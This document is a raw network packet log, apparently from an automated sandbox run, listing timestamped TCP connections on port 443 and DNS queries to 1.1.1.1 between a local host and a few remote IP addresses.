                                                                                                                                                                                                                                                Dec 20, 2024 16:46:14.320013046 CET49914443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:14.320095062 CET44349914104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:14.320179939 CET49914443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:14.363332987 CET44349914104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:14.435781002 CET44349915104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:14.436438084 CET49915443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:14.436470032 CET44349915104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:14.436794996 CET44349915104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:14.437571049 CET49915443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:14.437618017 CET44349915104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:14.437797070 CET49915443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:14.483321905 CET44349915104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:14.781585932 CET44349914104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:14.781665087 CET44349914104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:14.781739950 CET49914443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:14.946065903 CET49914443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:14.946103096 CET44349914104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:15.220711946 CET44349915104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:15.220921993 CET44349915104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:15.220993042 CET49915443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:15.221065998 CET44349915104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:15.221107960 CET44349915104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:15.221162081 CET49915443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:15.221896887 CET49915443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:15.221931934 CET44349915104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:15.308876991 CET49921443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:15.308931112 CET44349921104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:15.309003115 CET49921443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:15.309740067 CET49921443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:15.309762001 CET44349921104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:16.525181055 CET44349921104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:16.525574923 CET49921443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:16.525602102 CET44349921104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:16.525939941 CET44349921104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:16.526467085 CET49921443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:16.526530027 CET44349921104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:16.526736975 CET49921443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:16.526833057 CET49921443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:16.526855946 CET44349921104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:16.526907921 CET49921443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:16.526913881 CET44349921104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:16.527091980 CET49921443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:16.527115107 CET44349921104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:17.132294893 CET44349921104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:17.132399082 CET44349921104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:17.132472992 CET44349921104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:17.132472038 CET49921443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:17.132507086 CET44349921104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:17.132550001 CET49921443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:17.132556915 CET44349921104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:17.134614944 CET44349921104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:17.134660006 CET49921443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:17.134668112 CET44349921104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:17.142916918 CET44349921104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:17.142983913 CET49921443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:17.142996073 CET44349921104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:17.151428938 CET44349921104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:17.151490927 CET49921443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:17.151508093 CET44349921104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:17.201927900 CET49921443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:17.251861095 CET44349921104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:17.292231083 CET49921443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:17.326463938 CET44349921104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:17.330049038 CET44349921104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:17.330100060 CET49921443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:17.330118895 CET44349921104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:17.337613106 CET44349921104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:17.337686062 CET49921443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:17.337693930 CET44349921104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:17.345120907 CET44349921104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:17.345208883 CET49921443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:17.345216990 CET44349921104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:17.352709055 CET44349921104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:17.352782965 CET49921443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:17.352787971 CET44349921104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:17.352816105 CET44349921104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:17.352852106 CET49921443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:17.355920076 CET49921443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:17.355946064 CET44349921104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:17.495909929 CET49928443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:17.495959044 CET44349928104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:17.496033907 CET49928443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:17.496289015 CET49928443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:17.496301889 CET44349928104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:18.734157085 CET44349928104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:18.734498978 CET49928443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:18.734515905 CET44349928104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:18.734867096 CET44349928104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:18.735294104 CET49928443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:18.735384941 CET44349928104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:18.735485077 CET49928443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:18.783333063 CET44349928104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:19.178966045 CET44349928104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:19.179047108 CET44349928104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:19.179101944 CET49928443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:19.180712938 CET49928443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:19.180732012 CET44349928104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:22.851862907 CET49941443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:22.851912975 CET44349941104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:22.852010012 CET49941443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:22.852355003 CET49941443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:22.852365017 CET44349941104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:24.076694012 CET44349941104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:24.077049017 CET49941443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:24.077136993 CET44349941104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:24.077595949 CET44349941104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:24.077924967 CET49941443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:24.078013897 CET44349941104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:24.078078985 CET49941443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:24.078162909 CET49941443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:24.078186035 CET44349941104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:24.078285933 CET49941443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:24.078325987 CET44349941104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:24.714370012 CET44349941104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:24.714456081 CET44349941104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:24.714508057 CET49941443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:24.714541912 CET44349941104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:24.714754105 CET44349941104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:24.714788914 CET44349941104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:24.714796066 CET49941443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:24.714802980 CET44349941104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:24.714833975 CET49941443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:24.714839935 CET44349941104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:24.714849949 CET44349941104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:24.714890003 CET49941443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:24.716034889 CET49941443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:24.716052055 CET44349941104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:24.735909939 CET49946443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:24.735966921 CET44349946104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:24.736038923 CET49946443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:24.736283064 CET49946443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:24.736296892 CET44349946104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:25.197122097 CET49948443192.168.2.11104.21.73.56
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:25.197170019 CET44349948104.21.73.56192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:25.197227955 CET49948443192.168.2.11104.21.73.56
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:25.198147058 CET49948443192.168.2.11104.21.73.56
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:25.198169947 CET44349948104.21.73.56192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:25.706353903 CET49953443192.168.2.11142.250.181.132
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:25.706418991 CET44349953142.250.181.132192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:25.706491947 CET49953443192.168.2.11142.250.181.132
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:25.706773996 CET49953443192.168.2.11142.250.181.132
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:25.706788063 CET44349953142.250.181.132192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:25.970043898 CET44349946104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:25.970470905 CET49946443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:25.970510960 CET44349946104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:25.970818996 CET44349946104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:25.971260071 CET49946443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:25.971333027 CET44349946104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:25.971426010 CET49946443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:26.019340992 CET44349946104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:26.411487103 CET44349948104.21.73.56192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:26.412005901 CET49948443192.168.2.11104.21.73.56
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:26.412039995 CET44349948104.21.73.56192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:26.414200068 CET44349948104.21.73.56192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:26.414328098 CET49948443192.168.2.11104.21.73.56
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:26.414812088 CET49948443192.168.2.11104.21.73.56
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:26.414825916 CET49948443192.168.2.11104.21.73.56
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:26.414904118 CET44349948104.21.73.56192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:26.414943933 CET49948443192.168.2.11104.21.73.56
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:26.415002108 CET49948443192.168.2.11104.21.73.56
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:26.415405989 CET49954443192.168.2.11104.21.73.56
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:26.415523052 CET44349954104.21.73.56192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:26.415620089 CET49954443192.168.2.11104.21.73.56
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:26.415868044 CET49954443192.168.2.11104.21.73.56
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:26.415909052 CET44349954104.21.73.56192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:26.441127062 CET44349946104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:26.441205025 CET44349946104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:26.441462994 CET49946443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:26.442370892 CET49946443192.168.2.11104.18.94.41
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:26.442418098 CET44349946104.18.94.41192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:27.420598984 CET44349953142.250.181.132192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:27.421322107 CET49953443192.168.2.11142.250.181.132
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:27.421354055 CET44349953142.250.181.132192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:27.421724081 CET44349953142.250.181.132192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:27.423008919 CET49953443192.168.2.11142.250.181.132
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:27.423146963 CET44349953142.250.181.132192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:27.466460943 CET49953443192.168.2.11142.250.181.132
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:27.644140005 CET44349954104.21.73.56192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:27.644435883 CET49954443192.168.2.11104.21.73.56
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:27.644483089 CET44349954104.21.73.56192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:27.645916939 CET44349954104.21.73.56192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:27.645979881 CET49954443192.168.2.11104.21.73.56
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:27.648075104 CET49954443192.168.2.11104.21.73.56
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:27.648202896 CET44349954104.21.73.56192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:27.648588896 CET49954443192.168.2.11104.21.73.56
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:27.648626089 CET44349954104.21.73.56192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:27.700896978 CET49954443192.168.2.11104.21.73.56
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:28.599591970 CET44349954104.21.73.56192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:28.599749088 CET44349954104.21.73.56192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:28.601646900 CET49954443192.168.2.11104.21.73.56
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:28.601929903 CET49954443192.168.2.11104.21.73.56
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:28.601980925 CET44349954104.21.73.56192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:28.772969007 CET49960443192.168.2.11104.21.73.56
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:28.773015976 CET44349960104.21.73.56192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:28.773130894 CET49960443192.168.2.11104.21.73.56
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:28.773502111 CET49960443192.168.2.11104.21.73.56
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:28.773515940 CET44349960104.21.73.56192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:30.000422001 CET44349960104.21.73.56192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:30.000874996 CET49960443192.168.2.11104.21.73.56
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:30.000890970 CET44349960104.21.73.56192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:30.003935099 CET44349960104.21.73.56192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:30.004012108 CET49960443192.168.2.11104.21.73.56
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:30.004434109 CET49960443192.168.2.11104.21.73.56
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:30.004452944 CET49960443192.168.2.11104.21.73.56
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:30.004496098 CET44349960104.21.73.56192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:30.004548073 CET49960443192.168.2.11104.21.73.56
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:30.004548073 CET49960443192.168.2.11104.21.73.56
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:30.004882097 CET49966443192.168.2.11104.21.73.56
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:30.004931927 CET44349966104.21.73.56192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:30.004993916 CET49966443192.168.2.11104.21.73.56
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:30.005212069 CET49966443192.168.2.11104.21.73.56
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:30.005228996 CET44349966104.21.73.56192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:31.239365101 CET44349966104.21.73.56192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:31.239830017 CET49966443192.168.2.11104.21.73.56
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:31.239850044 CET44349966104.21.73.56192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:31.243140936 CET44349966104.21.73.56192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:31.243222952 CET49966443192.168.2.11104.21.73.56
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:31.243618965 CET49966443192.168.2.11104.21.73.56
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:31.243685007 CET44349966104.21.73.56192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:31.243789911 CET49966443192.168.2.11104.21.73.56
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:31.243798018 CET44349966104.21.73.56192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:31.294306993 CET49966443192.168.2.11104.21.73.56
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:32.362615108 CET44349966104.21.73.56192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:32.362819910 CET44349966104.21.73.56192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:32.362875938 CET49966443192.168.2.11104.21.73.56
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:32.364713907 CET49966443192.168.2.11104.21.73.56
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:32.364744902 CET44349966104.21.73.56192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:37.119345903 CET44349953142.250.181.132192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:37.119419098 CET44349953142.250.181.132192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:37.119492054 CET49953443192.168.2.11142.250.181.132
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:37.702536106 CET49953443192.168.2.11142.250.181.132
                                                                                                                                                                                                                                                Dec 20, 2024 16:46:37.702579021 CET44349953142.250.181.132192.168.2.11
                                                                                                                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:22.626203060 CET53517451.1.1.1192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:22.776420116 CET53615251.1.1.1192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:25.478908062 CET53534741.1.1.1192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:25.655411959 CET6415853192.168.2.111.1.1.1
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:25.655524969 CET6073153192.168.2.111.1.1.1
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:25.792143106 CET53641581.1.1.1192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:25.792445898 CET53607311.1.1.1192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:29.081235886 CET5943153192.168.2.111.1.1.1
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:29.081484079 CET5822553192.168.2.111.1.1.1
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:29.374011993 CET53582251.1.1.1192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:29.386212111 CET53594311.1.1.1192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:31.237373114 CET5184253192.168.2.111.1.1.1
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:31.237608910 CET6514353192.168.2.111.1.1.1
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:31.238089085 CET5060053192.168.2.111.1.1.1
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:31.238202095 CET5624453192.168.2.111.1.1.1
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:31.238883018 CET5595653192.168.2.111.1.1.1
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:31.239011049 CET6157853192.168.2.111.1.1.1
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:31.375247002 CET53518421.1.1.1192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:31.375700951 CET53559561.1.1.1192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:31.376070976 CET53506001.1.1.1192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:31.377481937 CET53615781.1.1.1192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:31.381138086 CET5399753192.168.2.111.1.1.1
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:31.381449938 CET5942253192.168.2.111.1.1.1
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:31.463099957 CET53562441.1.1.1192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:31.463587046 CET53651431.1.1.1192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:31.518398046 CET53539971.1.1.1192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:31.608474016 CET53594221.1.1.1192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.241132975 CET6458653192.168.2.111.1.1.1
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.241616011 CET6011953192.168.2.111.1.1.1
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.243916988 CET5303853192.168.2.111.1.1.1
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.244051933 CET5721953192.168.2.111.1.1.1
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.382077932 CET53530381.1.1.1192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.382189989 CET53572191.1.1.1192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.433213949 CET5978353192.168.2.111.1.1.1
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.433414936 CET5435953192.168.2.111.1.1.1
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.455950022 CET53645861.1.1.1192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.462982893 CET53601191.1.1.1192.168.2.11
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.479458094 CET4987053192.168.2.111.1.1.1
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.479618073 CET5909953192.168.2.111.1.1.1
                                                                                                                                                                                                                                                Dec 20, 2024 16:45:33.573241949 CET53597831.1.1.1192.168.2.11
